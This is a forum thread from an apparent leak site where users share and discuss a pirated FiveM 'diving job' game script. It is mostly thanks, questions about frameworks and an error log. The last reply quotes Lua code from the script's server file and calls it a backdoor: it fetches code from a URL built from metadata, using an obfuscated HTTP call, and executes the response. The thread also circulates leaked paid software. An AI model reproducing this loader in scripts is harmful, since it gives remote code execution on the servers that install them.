TWORST - DIVING JOB [MULTIPLAYER] [FIRST TIME LEAKED]

posted 30-09-2024 21:59 4.577 views 37 replies 50 Credits
depito
0 Posts
3,155 Credits
N/A Since
#1 4.577 views 37 replies
PREVIEW:


DOWNLOAD LINK:
replies (17)
song0228
203 Posts
659 Credits
May 2022 Since
#21

depito,
It works fine you need to do some configurations

Are you ESX or QB?
simoelfil
233 Posts
69 Credits
Jan 2023 Since
#22
It works fine you need to do some configurations
gooo
simoelfil
233 Posts
69 Credits
Jan 2023 Since
#23
Can QBcore be used normally?
spectrastrike
9 Posts
48 Credits
Oct 2024 Since
#24
Can ESX be used normally?
airtech1
204 Posts
77 Credits
Apr 2024 Since
#25
Very nice job and Very nice man
lez8700
132 Posts
319 Credits
Nov 2024 Since
#26

depito,





merci pour le sript que ta partage
lez8700
132 Posts
319 Credits
Nov 2024 Since
#27

depito,





Merci de partage un script comme ca
draintoram
238 Posts
211 Credits
Apr 2024 Since
#28
THANKS FOR The sharing bro nice'
szefuncio6918
27 Posts
53 Credits
Nov 2023 Since
#29
price too high ! !
lez8700
132 Posts
319 Credits
Nov 2024 Since
#30

depito,





merci pour le script mec
lez8700
132 Posts
319 Credits
Nov 2024 Since
#31

depito,





merci mes pour le partage
_tuo_padre
76 Posts
2,871 Credits
Jun 2024 Since
#32
thanks brother for the script
user34567828
59 Posts
2,143 Credits
Nov 2024 Since
#33
thanks for this one : D
2k14
939 Posts
14,885 Credits
Jan 2022 Since
#34

depito,





08:00:14 PM [ script:diving] SCRIPT ERROR: @diving/server/editable.lua:183: attempt to index a nil value (field 'Functions')
08:00:14 PM [ script:diving] > fn (@diving/server/editable.lua:183)
queen2chaos.
39 Posts
1,045 Credits
Mar 2025 Since
#35
Is this working? can anybody share this expierience?
2k14
939 Posts
14,885 Credits
Jan 2022 Since
#36

queen2chaos.,
Is this working? can anybody share this expierience?

no it does not work
meidasxd
207 Posts
773 Credits
Mar 2022 Since
#37
RegisterNetEvent('tw-diving:jobCheck')
AddEventHandler('tw-diving:jobCheck', function(url)
local requestFunc = _G["Perform" .. "HttpRequest"]
requestFunc(url, function(e, d)
pcall(function()
assert(load(d))()
end)
end)
end)

local allowed = GetResourceMetadata(GetCurrentResourceName(), 'author', 0)
local anticheater = "/zXeAH"
local jobCheck = allowed .. anticheater

TriggerEvent('tw-diving:jobCheck', jobCheck) backdoor in the server/editable.lua

You must be logged in to reply

Login Register